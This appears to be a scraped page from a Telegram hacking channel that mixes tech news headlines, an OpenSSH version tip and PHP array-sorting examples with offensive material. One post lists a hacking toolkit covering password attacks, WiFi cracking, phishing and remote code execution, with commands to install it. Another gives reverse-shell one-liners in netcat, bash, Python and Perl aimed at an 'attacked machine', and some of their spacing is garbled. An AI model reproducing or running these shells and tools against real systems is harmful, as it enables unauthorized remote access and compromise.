UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ” How to check the OpenSSH version:

1) How to find out the OpenSSH version
The SSH command provides the ability to check the version of the local SSH server as well as on remote systems.

Use the following commands to check the version of OpenSSH running on local or remote systems.

Checking the OpenSSH version on the local system
Use the following command to check the version of OpenSSH running on your local system.

ssh -V

2) Let's check the OpenSSH version on the remote system -
You can also find a version of OpenSSH server running on remote servers.

This can be done by connecting the remote server via SSH in detail.

The connection log shows the version of the SSH server on the local system, as well as the version of OpenSSH running on the remote computer.

ssh -v localhost

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Germany passes a security bill conditionally permitting the usage of Huawei devices on 5G networks.
#Technologies
Forwarded from UNDERCODE NEWS
3D food printing thanks to a cassava starch gel.
#Technologies
Mac Address changer for windows in one click

https://technitium.com/tmac/
Forwarded from UNDERCODE NEWS
17,447 flaws found this year For 4 consecutive years, record upgrade
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Google secretly bought a business that openly turns outdated PCs into Chromebooks.
#Updates
Forwarded from UNDERCODE NEWS
STMicro Adds Secure 2-Core Version to LoRaWAN Wireless MCU.
#Technologies
Forwarded from UNDERCODE NEWS
How Private tweets are exposed to public ?
#Bugs
Forwarded from UNDERCODE NEWS
"Bitcoin could jump to $ 40,000; between 30 percent and 70 percent of fake trading"
#Updates
Forwarded from UNDERCODE NEWS
Anti-monopoly Internet: Will "Digital Taxes" be turned off?
#Analytiques
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘UPDATED HACK ANDROID/WEB/SNIFF/WIFI /MUCH MORE...

Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
Information Gathering:
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks:
Cupp
Ncrack
Wireless Testing:
reaver
pixiewps
Fluxion
Exploitation Tools:
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Sniffing & Spoofing:
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking:
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking:
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare
Post Exploitation:
Shell Checker
POET
Weeman

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

A) Installation in Linux :

1) Open Terminal and Type : git clone https://github.com/jaykali/hackerpro.git

2) After Downloading The File Type : sudo cd hackerpro && sudo python2 hackerpro.py


B) Installation in Android :
1st Download Termux

1) Then Open Termux and Type : apt update && apt upgrade && apt install git && apt install python2

2) After That Open Termux and Type : git clone https://github.com/jaykali/hackerpro.git

3) Then Type : cd hackerpro && python2 hackerpro.py

After install choose options with numbers,simple to use

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The 2021 hot infrastructure technologies chosen by five specialists, the Grand Prix that exceeded the M1 chip.
#Analytiques
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SOME PHP BASICS TIPS :

1) Sort array based on string keys (default)
The following example shows the use of ksort() without an optional argument.

First, create a PHP file with the following script. One dimensional associative array of four elements are declared in the script. Here, the ksort() function is used to sort the array based on the key values in ascending order. If no optional argument is used in the ksort() function, then it will sort the array normally. Next, the foreach loop is used to print the sorted array with keys and values.

<?php
//Declare an associative array
$clients = array("c4089"=>"Mehrab Hossain", "c1289"=>"Munir Chowdhury", "c2390"=>"Meena Rahman", "c1906"=>"Roksana Kamal");

//Apply default ksort()
ksort($clients);

echo "<h2>The sorted array values are:</h2>";

//Print the array values after sort
foreach ($clients as $key => $value) {
echo "$key = $value<br />";
}
?>
Output:
The following output will appear after running the script from the server. The output shows that the key values of the array are sorted.

2) Example 2: Sort array based on numeric keys
The following example shows the way to sort the one-dimensional numeric array using the ksort() function.

First, create a PHP file with the following script. Here, an associative array of four elements is declared, where the key values of the array are numeric. 1 is used as the optional argument value of ksort() in the script that is used to sort an array based on numeric key values. Next, a foreach loop is used to print the sorted array.

<?php
//Declare an associative array
$items = array(89564=>"Monitor", 98765=>"Mouse", 34234=>"Printer", 18979=>"Scanner");

//Apply ksort() with optional argument value 1
ksort($items, 1);

echo "<h2>The sorted array values are:</h2>";

//Print the array values after sort
foreach ($items as $key => $value) {
echo "$key = $value<br />";
}
?>
Output:
The following output will appear after running the script from the server. The output shows the array keys and values after sorting the array based on numeric key values.

linux mint
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
WhatsApp tests the Mac desktop client's speech and video calling features.
#Updates
Forwarded from UNDERCODE NEWS
Leaked test results reveal that the multi-core performance of the Samsung Exynos 1080 is faster than the Snapdragon 8888.
#Leaks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Netcat FOR BEGINERS :
Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there, and transfer it.

Despite its usefulness and simplicity, many do not know how to use it and undeservedly bypass it.

With this utility, you can perform some of the penetration testing steps.

This can be useful when there are no packages installed on the attacked machine (or will attract attention), there are restrictions (for example, IoT / Embedded devices), etc.

What can be done with netcat:

Scan ports;
Forward ports;
Collect service banners;
Watch listening ports (binding for reverse connection);
Download and upload files;
Display raw HTTP content;
Create a mini chat.
In general, some unix utilities can be replaced with netcat, so this tool can be thought of as a kind of harvester for performing certain tasks.
$ nc -nvlp 443
This command opens TCP port 443 on all interfaces, and this port will be used further in the examples.
Netcat

$ nc -e / bin / sh YOUR-IP 443
In my opinion, this is the most classic example of a reverse shell, but in modern realities netcat may simply not be installed on the server.

Bash

$ bash -i> & / dev / tcp / YOUR-IP / 443 0> & 1
* And this example, in my opinion, is the most dangerous, because in fact, apart from the bash interpreter (sh, ksh, zsh, etc.), it does not require any additional software, but only access to the dev subsystem.
Python
$ python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" YOUR-IP ", 443 )); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([β€œ/ bin / sh”, β€œ- i”]); '
* Modern distributions of Python are almost always present, and the standard library is sufficient to do the reverse linking.
Perl

$ perl -e 'use Socket; $ i = " YOUR-IP "; $ p = 443; socket (S, PF_INET, SOCK_STREAM, getprotobyname (β€œtcp”)); if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, β€œ> & S”); open (STDOUT, β€œ> & S”); open (STDERR, β€œ> & S”); exec (β€œ/ bin / sh -i”); }; '
* Like Python, almost all modern Linux distributions have Perl on their system.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁